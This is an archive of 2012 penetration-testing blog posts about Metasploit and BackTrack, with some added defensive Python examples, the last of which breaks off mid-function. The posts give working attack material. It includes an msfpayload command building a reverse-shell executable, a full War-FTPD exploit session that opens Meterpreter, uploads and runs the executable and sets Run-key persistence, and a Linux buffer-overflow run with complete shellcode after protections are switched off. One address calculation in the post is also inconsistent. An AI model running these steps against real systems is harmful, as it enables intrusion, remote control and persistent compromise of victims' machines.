Wednesday, 29 February 2012
Update BeEF and Metasploit
Monday, 27 February 2012
Auxiliary Modules Using Msf
This module performs SNMP sweeps against the given range of network addresses using a well-known set of community strings (snmp_login) and prints the discovered SNMP device information on the screen.
root@bt:~# msfconsole
Social Engineering Toolkit
Social engineering, also known as hacking the human, is the act of manipulating the human mind to reach a goal. Social engineering is a common term; everyone uses it in daily life, but its use in penetration testing and hacking is a bit different. The main uses of social engineering in hacking are to obtain information, to maintain access, and so on.
There are a variety of social engineering tips and tricks available on the Internet; in addition, the Social Engineering Toolkit is available to carry out computer-based social engineering attacks....
Msfencode And Msfpayload
Msfencode
The shellcode produced by msfpayload is fully functional, but it contains some null characters which, when interpreted by many programs, signal the end of the string and cause the code to terminate before completion. In other words, the raw payload has to be encoded first:
root@bt:~# msfpayload windows/shell_reverse_tcp LHOST=192.168.56.1 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -t exe > sexy.exe
[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1)
The result is shown in the picture below.
Msfpayload
Msfpayload is the component of Metasploit used to generate shellcode and executables for use in exploitation outside of the Framework. Shellcode can be generated in many formats, including C, Ruby, JavaScript, and even Visual Basic for Applications; each output format is useful in different situations.
Example:
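To see concretely why the null bytes matter, here is an added example (not from the original post and not Metasploit code) that reads a byte string the way a C program treats a NUL-terminated string and reports which bytes would cut it short. The payload bytes in it are a constructed dummy, not a real shellcode; the bad-character set is the usual NUL, LF and CR.

```python
"""Why raw shellcode with NUL bytes gets truncated, and how to check for it.

Added example, not from the original post or from Metasploit. It relies on
C-string semantics that many programs apply to their input: copying stops at
the first 0x00 byte. RAW_PAYLOAD is a constructed dummy, not a real payload.
"""
import ctypes
from typing import List, Tuple

# Constructed stand-in for a raw payload: the 0x00 at offset 3 is the problem,
# the 0x0a / 0x0d near the end would break line-oriented protocols.
RAW_PAYLOAD = b"\x31\xc0\x50\x00\x68\x2f\x2f\x73\x68\x0a\x0d\x90"

# Bytes that commonly terminate or mangle input: NUL, LF, CR.
DEFAULT_BADCHARS = b"\x00\x0a\x0d"


def find_badchars(payload: bytes, badchars: bytes = DEFAULT_BADCHARS) -> List[Tuple[int, int]]:
    """Return (offset, byte) for every occurrence of a bad byte in payload."""
    return [(i, b) for i, b in enumerate(payload) if b in badchars]


def as_c_string(payload: bytes) -> bytes:
    """What a C program keeps after strcpy()-style handling: bytes up to the first NUL.

    ctypes.c_char_p reads the buffer like a NUL-terminated char*, so the value
    it returns shows exactly where such a copy stops.
    """
    return ctypes.c_char_p(payload).value or b""


def truncation_report(payload: bytes) -> dict:
    """Summarise how much of the payload survives a C-string copy and why."""
    kept = as_c_string(payload)
    return {
        "total_bytes": len(payload),
        "bytes_kept": len(kept),
        "lost_bytes": len(payload) - len(kept),
        "badchars": find_badchars(payload),
    }


if __name__ == "__main__":
    report = truncation_report(RAW_PAYLOAD)
    print(f"{report['bytes_kept']} of {report['total_bytes']} bytes survive a C-string copy")
    for offset, byte in report["badchars"]:
        print(f"  bad byte 0x{byte:02x} at offset {offset}")
```

Running the same check on the output of msfencode is the sensible follow-up: an encoder such as x86/shikata_ga_nai is chosen precisely so that find_badchars returns an empty list for the encoded bytes.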
root@bt:~# msfconsole
IIIIII dTb.dTb _.---._
II 4' v 'B .'"".'/|`.""'.
II 6. .P : .' / | `. :
II 'T;. .;P' '.' / | `.'
II 'T; ;P' `. / | .'
IIIIII 'YvP' `-.__|__.-'
I love shells --egypt
=[ metasploit v4.2.0-dev [core:4.2 api:1.0]
+ -- --=[ 787 exploits - 425 auxiliary - 128 post
+ -- --=[ 238 payloads - 27 encoders - 8 nops
=[ svn r14551 updated 14 days ago (2012.01.14)
Warning: This copy of the Metasploit Framework was last updated 14 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
msf > use exploit/windows/ftp/warftpd_165_user
msf exploit(warftpd_165_user) > search warftp

Matching Modules
================

   Name                                  Disclosure Date  Rank     Description
   ----                                  ---------------  ----     -----------
   exploit/windows/ftp/warftpd_165_pass  1998-03-19       average  War-FTPD 1.65 Password Overflow
   exploit/windows/ftp/warftpd_165_user  1998-03-19       average  War-FTPD 1.65 Username Overflow

msf exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOST                         yes       The target address
   RPORT    21                   yes       The target port

msf exploit(warftpd_165_user) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOST    192.168.56.101       yes       The target address
   RPORT    21                   yes       The target port
show payloads
Compatible Payloads
===================
Name
Disclosure Date Rank Description
----
--------------- ---- -----------
generic/custom
normal Custom Payload
generic/debug_trap
normal Generic x86 Debug Trap
generic/shell_bind_tcp
normal Generic Command Shell, Bind TCP
Inline
generic/shell_reverse_tcp
normal Generic Command Shell, Reverse
TCP Inline
generic/tight_loop
normal Generic x86 Tight Loop
windows/dllinject/bind_ipv6_tcp
normal Reflective Dll Injection, Bind
TCP Stager (IPv6)
windows/dllinject/bind_nonx_tcp
normal Reflective Dll Injection, Bind
TCP Stager (No NX or Win7)
windows/dllinject/bind_tcp
normal Reflective Dll Injection, Bind
TCP Stager
windows/dllinject/reverse_http
normal Reflective Dll Injection,
Reverse HTTP Stager
windows/dllinject/reverse_ipv6_http
normal Reflective Dll Injection,
Reverse HTTP Stager (IPv6)
windows/dllinject/reverse_ipv6_tcp
normal Reflective Dll Injection,
Reverse TCP Stager (IPv6)
windows/dllinject/reverse_nonx_tcp
normal Reflective Dll Injection,
Reverse TCP Stager (No NX or Win7)
windows/dllinject/reverse_ord_tcp
normal Reflective Dll Injection,
Reverse Ordinal TCP Stager (No NX or Win7)
windows/dllinject/reverse_tcp
normal Reflective Dll Injection,
Reverse TCP Stager
windows/dllinject/reverse_tcp_allports
normal Reflective Dll Injection, Reverse All-Port TCP Stager
windows/dllinject/reverse_tcp_dns
normal Reflective Dll Injection,
Reverse TCP Stager (DNS)
windows/download_exec
normal Windows Executable Download and
Execute
windows/exec
normal Windows Execute Command
windows/loadlibrary
normal Windows LoadLibrary Path
windows/messagebox
normal Windows MessageBox
windows/meterpreter/bind_ipv6_tcp
normal Windows Meterpreter (Reflective
Injection), Bind TCP Stager (IPv6)
windows/meterpreter/bind_nonx_tcp
normal Windows Meterpreter (Reflective
Injection), Bind TCP Stager (No NX or Win7)
windows/meterpreter/bind_tcp
normal Windows Meterpreter (Reflective
Injection), Bind TCP Stager
windows/meterpreter/reverse_http
normal Windows Meterpreter (Reflective
Injection), Reverse HTTP Stager
windows/meterpreter/reverse_https
normal Windows Meterpreter (Reflective
Injection), Reverse HTTPS Stager
windows/meterpreter/reverse_ipv6_http
normal Windows Meterpreter (Reflective Injection), Reverse HTTP
Stager (IPv6)
windows/meterpreter/reverse_ipv6_https
normal Windows Meterpreter (Reflective Injection), Reverse HTTPS
Stager (IPv6)
windows/meterpreter/reverse_ipv6_tcp
normal Windows Meterpreter (Reflective
Injection), Reverse TCP Stager (IPv6)
windows/meterpreter/reverse_nonx_tcp
normal Windows Meterpreter (Reflective
Injection), Reverse TCP Stager (No NX or Win7)
windows/meterpreter/reverse_ord_tcp
normal Windows Meterpreter (Reflective
Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/meterpreter/reverse_tcp
normal Windows Meterpreter (Reflective
Injection), Reverse TCP Stager
windows/meterpreter/reverse_tcp_allports
normal Windows Meterpreter (Reflective Injection), Reverse All-Port
TCP Stager
windows/meterpreter/reverse_tcp_dns
normal Windows Meterpreter (Reflective
Injection), Reverse TCP Stager (DNS)
windows/metsvc_bind_tcp
normal Windows Meterpreter Service,
Bind TCP
windows/metsvc_reverse_tcp
normal Windows Meterpreter Service,
Reverse TCP Inline
windows/patchupdllinject/bind_ipv6_tcp
normal Windows Inject DLL, Bind TCP Stager (IPv6)
windows/patchupdllinject/bind_nonx_tcp
normal Windows Inject DLL, Bind TCP Stager (No NX or Win7)
windows/patchupdllinject/bind_tcp
normal Windows Inject DLL, Bind TCP
Stager
windows/patchupdllinject/reverse_ipv6_tcp
normal Windows Inject DLL, Reverse TCP Stager (IPv6)
windows/patchupdllinject/reverse_nonx_tcp
normal Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
windows/patchupdllinject/reverse_ord_tcp
normal Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or
Win7)
windows/patchupdllinject/reverse_tcp
normal Windows Inject DLL, Reverse TCP
Stager
windows/patchupdllinject/reverse_tcp_allports
normal Windows Inject DLL, Reverse All-Port TCP Stager
windows/patchupdllinject/reverse_tcp_dns
normal Windows Inject DLL, Reverse TCP Stager (DNS)
windows/patchupmeterpreter/bind_ipv6_tcp
normal Windows Meterpreter (skape/jt injection), Bind TCP Stager
(IPv6)
windows/patchupmeterpreter/bind_nonx_tcp
normal Windows Meterpreter (skape/jt injection), Bind TCP Stager (No
NX or Win7)
windows/patchupmeterpreter/bind_tcp
normal Windows Meterpreter (skape/jt
injection), Bind TCP Stager
windows/patchupmeterpreter/reverse_ipv6_tcp
normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager
(IPv6)
windows/patchupmeterpreter/reverse_nonx_tcp
normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager
(No NX or Win7)
windows/patchupmeterpreter/reverse_ord_tcp
normal Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP
Stager (No NX or Win7)
windows/patchupmeterpreter/reverse_tcp
normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager
windows/patchupmeterpreter/reverse_tcp_allports
normal Windows Meterpreter (skape/jt injection), Reverse All-Port
TCP Stager
windows/patchupmeterpreter/reverse_tcp_dns
normal Windows Meterpreter (skape/jt injection), Reverse TCP Stager
(DNS)
windows/shell/bind_ipv6_tcp
normal Windows Command Shell, Bind TCP
Stager (IPv6)
windows/shell/bind_nonx_tcp
normal Windows Command Shell, Bind TCP
Stager (No NX or Win7)
windows/shell/bind_tcp
normal Windows Command Shell, Bind TCP
Stager
windows/shell/reverse_http
normal Windows Command Shell, Reverse
HTTP Stager
windows/shell/reverse_ipv6_http
normal Windows Command Shell, Reverse
HTTP Stager (IPv6)
windows/shell/reverse_ipv6_tcp
normal Windows Command Shell, Reverse
TCP Stager (IPv6)
windows/shell/reverse_nonx_tcp
normal Windows Command Shell, Reverse
TCP Stager (No NX or Win7)
windows/shell/reverse_ord_tcp
normal Windows Command Shell, Reverse
Ordinal TCP Stager (No NX or Win7)
windows/shell/reverse_tcp
normal Windows Command Shell, Reverse
TCP Stager
windows/shell/reverse_tcp_allports
normal Windows Command Shell, Reverse
All-Port TCP Stager
windows/shell/reverse_tcp_dns
normal Windows Command Shell, Reverse
TCP Stager (DNS)
windows/shell_bind_tcp
normal Windows Command Shell, Bind TCP
Inline
windows/shell_reverse_tcp
normal Windows Command Shell, Reverse
TCP Inline
windows/speak_pwned
normal Windows Speech API - Say "You
Got Pwned!"
windows/upexec/bind_ipv6_tcp
normal Windows Upload/Execute, Bind TCP
Stager (IPv6)
windows/upexec/bind_nonx_tcp
normal Windows Upload/Execute, Bind TCP
Stager (No NX or Win7)
windows/upexec/bind_tcp
normal Windows Upload/Execute, Bind TCP
Stager
windows/upexec/reverse_http
normal Windows Upload/Execute, Reverse
HTTP Stager
windows/upexec/reverse_ipv6_http
normal Windows Upload/Execute, Reverse
HTTP Stager (IPv6)
windows/upexec/reverse_ipv6_tcp
normal Windows Upload/Execute, Reverse
TCP Stager (IPv6)
windows/upexec/reverse_nonx_tcp
normal Windows Upload/Execute, Reverse
TCP Stager (No NX or Win7)
windows/upexec/reverse_ord_tcp
normal Windows Upload/Execute, Reverse
Ordinal TCP Stager (No NX or Win7)
windows/upexec/reverse_tcp
normal Windows Upload/Execute, Reverse
TCP Stager
windows/upexec/reverse_tcp_allports
normal Windows Upload/Execute, Reverse
All-Port TCP Stager
windows/upexec/reverse_tcp_dns
normal Windows Upload/Execute, Reverse
TCP Stager (DNS)
windows/vncinject/bind_ipv6_tcp
normal VNC Server (Reflective
Injection), Bind TCP Stager (IPv6)
windows/vncinject/bind_nonx_tcp
normal VNC Server (Reflective
Injection), Bind TCP Stager (No NX or Win7)
windows/vncinject/bind_tcp
normal VNC Server (Reflective
Injection), Bind TCP Stager
windows/vncinject/reverse_http
normal VNC Server (Reflective
Injection), Reverse HTTP Stager
windows/vncinject/reverse_ipv6_http
normal VNC Server (Reflective
Injection), Reverse HTTP Stager (IPv6)
windows/vncinject/reverse_ipv6_tcp
normal VNC Server (Reflective
Injection), Reverse TCP Stager (IPv6)
windows/vncinject/reverse_nonx_tcp
normal VNC Server (Reflective
Injection), Reverse TCP Stager (No NX or Win7)
windows/vncinject/reverse_ord_tcp
normal VNC Server (Reflective
Injection), Reverse Ordinal TCP Stager (No NX or Win7)
windows/vncinject/reverse_tcp
normal VNC Server (Reflective
Injection), Reverse TCP Stager
windows/vncinject/reverse_tcp_allports
normal VNC Server (Reflective Injection), Reverse All-Port TCP
Stager
windows/vncinject/reverse_tcp_dns
normal VNC Server (Reflective
Injection), Reverse TCP Stager (DNS)
msf exploit(warftpd_165_user) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOST    192.168.56.101       yes       The target address
   RPORT    21                   yes       The target port

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

msf exploit(warftpd_165_user) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOST    192.168.56.101       yes       The target address
   RPORT    21                   yes       The target port

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.56.1     yes       The listen address
   LPORT     4444             yes       The listen port

msf exploit(warftpd_165_user) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows 2000 SP0-SP4 English
   1   Windows XP SP0-SP1 English
   2   Windows XP SP2 English
   3   Windows XP SP3 English

msf exploit(warftpd_165_user) > set targets 3
targets => 3
msf exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOST    192.168.56.101       yes       The target address
   RPORT    21                   yes       The target port

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.56.1     yes       The listen address
   LPORT     4444             yes       The listen port
msf exploit(warftpd_165_user) > exploit
[-] Exploit failed: A target has not been selected.
msf exploit(warftpd_165_user) > set target 3
target => 3
msf exploit(warftpd_165_user) > show options

Module options (exploit/windows/ftp/warftpd_165_user):

   Name     Current Setting      Required  Description
   ----     ---------------      --------  -----------
   FTPPASS  mozilla@example.com  no        The password for the specified username
   FTPUSER  anonymous            no        The username to authenticate as
   RHOST    192.168.56.101       yes       The target address
   RPORT    21                   yes       The target port

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LHOST     192.168.56.1     yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   3   Windows XP SP3 English

msf exploit(warftpd_165_user) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[-] Exploit exception: The connection was refused by the remote host (192.168.56.101:21).
[*] Exploit completed, but no session was created.
msf exploit(warftpd_165_user) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Trying target Windows XP SP3 English...
[*] Sending stage (752128 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1050) at 2012-02-27 20:27:04 +0700
meterpreter > ps

Process list
============

 PID   Name               Arch  Session  User                  Path
 ---   ----               ----  -------  ----                  ----
 0     [System Process]
 1040  svchost.exe        x86   0        NT AUTHORITY\SYSTEM   C:\WINDOWS\System32\svchost.exe
 1104  svchost.exe        x86   0                              C:\WINDOWS\system32\svchost.exe
 1156  svchost.exe        x86   0                              C:\WINDOWS\system32\svchost.exe
 1496  spoolsv.exe        x86   0        NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\spoolsv.exe
 1600  svchost.exe        x86   0        WEKO-9B92FC1EF0\weko  C:\WINDOWS\system32\svchost.exe
 1660  explorer.exe       x86   0        WEKO-9B92FC1EF0\weko  C:\WINDOWS\Explorer.EXE
 1712  alg.exe            x86   0                              C:\WINDOWS\System32\alg.exe
 1808  VBoxTray.exe       x86   0        WEKO-9B92FC1EF0\weko  C:\WINDOWS\system32\VBoxTray.exe
 1816  GrooveMonitor.exe  x86   0        WEKO-9B92FC1EF0\weko  C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
 1828  ctfmon.exe         x86   0        WEKO-9B92FC1EF0\weko  C:\WINDOWS\system32\ctfmon.exe
 1984  svchost.exe        x86   0        WEKO-9B92FC1EF0\weko  C:\WINDOWS\system32\svchost.exe
 2136  wscntfy.exe        x86   0        WEKO-9B92FC1EF0\weko  C:\WINDOWS\system32\wscntfy.exe
 3120  wuauclt.exe        x86   0        WEKO-9B92FC1EF0\weko  C:\WINDOWS\system32\wuauclt.exe
 3464  wpabaln.exe        x86   0        WEKO-9B92FC1EF0\weko  C:\WINDOWS\system32\wpabaln.exe
 4     System             x86   0
 4064  war-ftpd.exe       x86   0        WEKO-9B92FC1EF0\weko  C:\Documents and Settings\weko\My Documents\instaler\war-ftpd.exe
 444   AntDS.exe          x86   0        NT AUTHORITY\SYSTEM   C:\Program Files\BigAntSoft\AntServer\AntDS.exe
 464   AntServer.exe      x86   0        NT AUTHORITY\SYSTEM   C:\Program Files\BigAntSoft\AntServer\AntServer.exe
 488   AvServer.exe       x86   0        NT AUTHORITY\SYSTEM   C:\Program Files\BigAntSoft\AntServer\AvServer.exe
 520   smss.exe           x86   0        NT AUTHORITY\SYSTEM   \SystemRoot\System32\smss.exe
 584   csrss.exe          x86   0        NT AUTHORITY\SYSTEM   \??\C:\WINDOWS\system32\csrss.exe
 608   winlogon.exe       x86   0        NT AUTHORITY\SYSTEM   \??\C:\WINDOWS\system32\winlogon.exe
 660   services.exe       x86   0        NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\services.exe
 672   lsass.exe          x86   0        NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\lsass.exe
 828   VBoxService.exe    x86   0        NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\VBoxService.exe
 872   svchost.exe        x86   0        NT AUTHORITY\SYSTEM   C:\WINDOWS\system32\svchost.exe
 948   svchost.exe        x86   0                              C:\WINDOWS\system32\svchost.exe
meterpreter > ?

Core Commands
=============

    Command                   Description
    -------                   -----------
    ?                         Help menu
    background                Backgrounds the current session
    bgkill                    Kills a background meterpreter script
    bglist                    Lists running background scripts
    bgrun                     Executes a meterpreter script as a background thread
    channel                   Displays information about active channels
    close                     Closes a channel
    detach                    Detach the meterpreter session (for http/https)
    disable_unicode_encoding  Disables encoding of unicode strings
    enable_unicode_encoding   Enables encoding of unicode strings
    exit                      Terminate the meterpreter session
    help                      Help menu
    info                      Displays information about a Post module
    interact                  Interacts with a channel
    irb                       Drop into irb scripting mode
    load                      Load one or more meterpreter extensions
    migrate                   Migrate the server to another process
    quit                      Terminate the meterpreter session
    read                      Reads data from a channel
    resource                  Run the commands stored in a file
    run                       Executes a meterpreter script or Post module
    use                       Deprecated alias for 'load'
    write                     Writes data to a channel

Stdapi: File system Commands
============================

    Command       Description
    -------       -----------
    cat           Read the contents of a file to the screen
    cd            Change directory
    del           Delete the specified file
    download      Download a file or directory
    edit          Edit a file
    getlwd        Print local working directory
    getwd         Print working directory
    lcd           Change local working directory
    lpwd          Print local working directory
    ls            List files
    mkdir         Make directory
    pwd           Print working directory
    rm            Delete the specified file
    rmdir         Remove directory
    search        Search for files
    upload        Upload a file or directory

Stdapi: Networking Commands
===========================

    Command       Description
    -------       -----------
    ipconfig      Display interfaces
    portfwd       Forward a local port to a remote service
    route         View and modify the routing table

Stdapi: System Commands
=======================

    Command       Description
    -------       -----------
    clearev       Clear the event log
    drop_token    Relinquishes any active impersonation token.
    execute       Execute a command
    getpid        Get the current process identifier
    getprivs      Attempt to enable all privileges available to the current process
    getuid        Get the user that the server is running as
    kill          Terminate a process
    ps            List running processes
    reboot        Reboots the remote computer
    reg           Modify and interact with the remote registry
    rev2self      Calls RevertToSelf() on the remote machine
    shell         Drop into a system command shell
    shutdown      Shuts down the remote computer
    steal_token   Attempts to steal an impersonation token from the target process
    sysinfo       Gets information about the remote system, such as OS

Stdapi: User interface Commands
===============================

    Command        Description
    -------        -----------
    enumdesktops   List all accessible desktops and window stations
    getdesktop     Get the current meterpreter desktop
    idletime       Returns the number of seconds the remote user has been idle
    keyscan_dump   Dump the keystroke buffer
    keyscan_start  Start capturing keystrokes
    keyscan_stop   Stop capturing keystrokes
    screenshot     Grab a screenshot of the interactive desktop
    setdesktop     Change the meterpreters current desktop
    uictl          Control some of the user interface components

Stdapi: Webcam Commands
=======================

    Command        Description
    -------        -----------
    record_mic     Record audio from the default microphone for X seconds
    webcam_list    List webcams
    webcam_snap    Take a snapshot from the specified webcam

Priv: Elevate Commands
======================

    Command        Description
    -------        -----------
    getsystem      Attempt to elevate your privilege to that of local system.

Priv: Password database Commands
================================

    Command        Description
    -------        -----------
    hashdump       Dumps the contents of the SAM database

Priv: Timestomp Commands
========================

    Command        Description
    -------        -----------
    timestomp      Manipulate file MACE attributes
meterpreter > upload /root/sexy.exe c:\\windows\\system32
[*] uploading  : /root/sexy.exe -> c:\windows\system32
[*] uploaded   : /root/sexy.exe -> c:\windows\system32\sexy.exe
meterpreter > execute -f sexy.exe
Process 3372 created.
meterpreter > execute -f sexy.exe
Process 2816 created.
meterpreter > reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\run -v start -d 'c:\\windows\
Successful set start.
meterpreter > reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\run -v start -d 'c:\\window
Key: HKLM\Software\Microsoft\Windows\CurrentVersion\run
Name: start
Type: REG_SZ
Data: c:\\windows\\system32\\sexy.exe
meterpreter > reboot
Rebooting...
meterpreter >
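The last steps of the session above (upload an executable into system32, then register it under the Run key so it survives the reboot) are exactly the kind of change a defender looks for. Here is an added example, not from the original post and not Metasploit code, that parses two constructed dumps in the layout of Windows "reg query" output, a known-good baseline and a later snapshot, and reports the autorun values that appeared or changed. The VBoxTray and ctfmon entries in the baseline are constructed; the "start" value and its data are the ones the session above wrote.

```python
"""Detect Run-key persistence by diffing the key against a known-good baseline.

Added example, not from the original post or from Metasploit. The two dumps
are constructed text in the layout of 'reg query <key>' output; the 'start'
value is the one written in the meterpreter session above.
"""
import re
from typing import Dict, List, NamedTuple

RUN_KEY = r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"

# Constructed baseline taken from a known-good machine.
BASELINE_DUMP = f"""
{RUN_KEY}
    VBoxTray    REG_SZ    C:\\WINDOWS\\system32\\VBoxTray.exe
    ctfmon.exe    REG_SZ    C:\\WINDOWS\\system32\\ctfmon.exe
"""

# Constructed snapshot taken after the session above; the 'start' value is new.
CURRENT_DUMP = f"""
{RUN_KEY}
    VBoxTray    REG_SZ    C:\\WINDOWS\\system32\\VBoxTray.exe
    ctfmon.exe    REG_SZ    C:\\WINDOWS\\system32\\ctfmon.exe
    start    REG_SZ    c:\\windows\\system32\\sexy.exe
"""

# A value line: indented name, REG_* type, then data (which may contain spaces).
VALUE_LINE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*?)\s*$")


class RegValue(NamedTuple):
    kind: str
    data: str


def parse_reg_dump(text: str) -> Dict[str, RegValue]:
    """Parse the value lines of a single-key 'reg query' dump into {name: (type, data)}.

    The unindented key-path line does not match VALUE_LINE and is skipped."""
    values: Dict[str, RegValue] = {}
    for line in text.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            name, kind, data = m.groups()
            values[name] = RegValue(kind, data)
    return values


def diff_run_key(baseline: Dict[str, RegValue], current: Dict[str, RegValue]) -> Dict[str, List[str]]:
    """Names added, removed, or changed (type or data) relative to the baseline."""
    added = [n for n in current if n not in baseline]
    removed = [n for n in baseline if n not in current]
    changed = [n for n in current if n in baseline and current[n] != baseline[n]]
    return {"added": added, "removed": removed, "changed": changed}


def autorun_alerts(baseline_text: str, current_text: str) -> List[str]:
    """One alert line per new or modified autorun: 'key\\name -> data'."""
    baseline = parse_reg_dump(baseline_text)
    current = parse_reg_dump(current_text)
    findings = diff_run_key(baseline, current)
    return [f"{RUN_KEY}\\{name} -> {current[name].data}"
            for name in findings["added"] + findings["changed"]]


if __name__ == "__main__":
    for alert in autorun_alerts(BASELINE_DUMP, CURRENT_DUMP):
        print("new or changed autorun:", alert)
```

The diff is the reliable part; a name like "start" pointing at an unfamiliar binary in system32 is a strong hint, but the baseline comparison catches it even when the attacker picks a plausible-looking name. On a real host the baseline would come from a golden image and the current dump from "reg query" or an autoruns export.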
Friday, 24 February 2012
Linux Exploitation in BT 5 r1
Exploit Linux
Before we start, we should pray that the exploitation of Linux goes smoothly,
hehehehehe....
:)
We start from the beginning of the story of Linux exploitation and go straight to the scene of the crime (TKP)!
hehehehe ...
:)
Okay, first we open a terminal and run the following commands:
root@bt:~# cat /proc/sys/kernel/randomize_va_space
root@bt:~# echo 0 > /proc/sys/kernel/randomize_va_space
root@bt:~# cat /proc/sys/kernel/randomize_va_space
As shown in the picture below.
Then we create a file with the .c extension, written in C++, which looks like the picture below.
Next, compile the script to trigger the buffer overflow.
Next we deal with a protection technique called "stack-smashing protection" (SSP), which is used to detect a buffer overflow on the stack before the malicious code is executed.
We can turn SSP off by adding the "-fno-stack-protector" flag to gcc when compiling.
Then we send 505 characters, but EIP is still not overwritten; then we send 508 characters and we can see that EIP is 0x41414141, as shown in the picture below.
Then we can see that the values of EBP and EIP have been overwritten. Next, we examine a specific register, ESP, as shown below.
Then we try to find out the address of ESP and subtract 200 bytes from it.
Next, we subtract 200 from ESP. ESP is at address bffff16c, so we get the result: 0xbffff16c - 200 = 0xbfffef6c. To calculate these values we can use the KCalc application.
Next, generate the shellcode and run:
run $(python -c 'print "\x90" * 323 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\xa4\xf0\xff\xbf" * 35')
Exploitation success....
:)
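The walkthrough above rests on a handful of numbers: the randomize_va_space setting, the ESP-minus-200 address, and the 508-byte layout of NOP sled, shellcode and repeated return address. Here is an added example (not from the original post) that checks them. It does not reproduce the shellcode; it only uses its length, 45 bytes, counted from the string in the run command. The meanings of the randomize_va_space levels are the Linux kernel's documented ones. One thing it makes visible: the bytes actually used in the run command, \xa4\xf0\xff\xbf, are 0xbffff0a4, which is 0xbffff16c minus 200 in decimal; the figure written in the text, 0xbfffef6c, is what you get by subtracting 0x200 (512) instead, so a calculator in hex mode and one in decimal mode give different answers here.

```python
"""Check the numbers behind the stack-overflow walkthrough above.

Added example, not from the original post. Inputs are the post's own figures:
ESP = 0xbffff16c, 508 bytes overwrite EIP, 323 NOPs, a 45-byte shellcode
(length counted from the run command; the bytes are not reproduced here) and
the return address repeated 35 times.
"""
import struct

# Documented meanings of /proc/sys/kernel/randomize_va_space.
ASLR_LEVELS = {
    0: "disabled",
    1: "conservative: stack, mmap base and VDSO randomised",
    2: "full: also randomises the heap (brk)",
}


def aslr_state(sysctl_value: str) -> str:
    """Interpret the text read from /proc/sys/kernel/randomize_va_space."""
    level = int(sysctl_value.strip())
    return ASLR_LEVELS.get(level, f"unknown level {level}")


def return_address(esp: int, offset: int) -> int:
    """ESP minus an offset, the way the walkthrough picks an address in the NOP sled."""
    return esp - offset


def pack_address(addr: int) -> bytes:
    """32-bit little-endian encoding, the byte order the x86 payload string needs."""
    return struct.pack("<I", addr)


def check_layout(nop_len: int, shellcode_len: int, addr_repeats: int, eip_offset: int) -> dict:
    """Lay out [NOPs][shellcode][address * n] and test whether one copy of the
    address falls exactly on the saved-EIP slot at eip_offset."""
    addr_start = nop_len + shellcode_len
    total = addr_start + 4 * addr_repeats
    covers_eip = addr_start <= eip_offset <= total - 4
    aligned = (eip_offset - addr_start) % 4 == 0
    return {
        "total": total,
        "addr_start": addr_start,
        "covers_eip": covers_eip,
        "aligned": aligned,
        "lands_on_eip": covers_eip and aligned,
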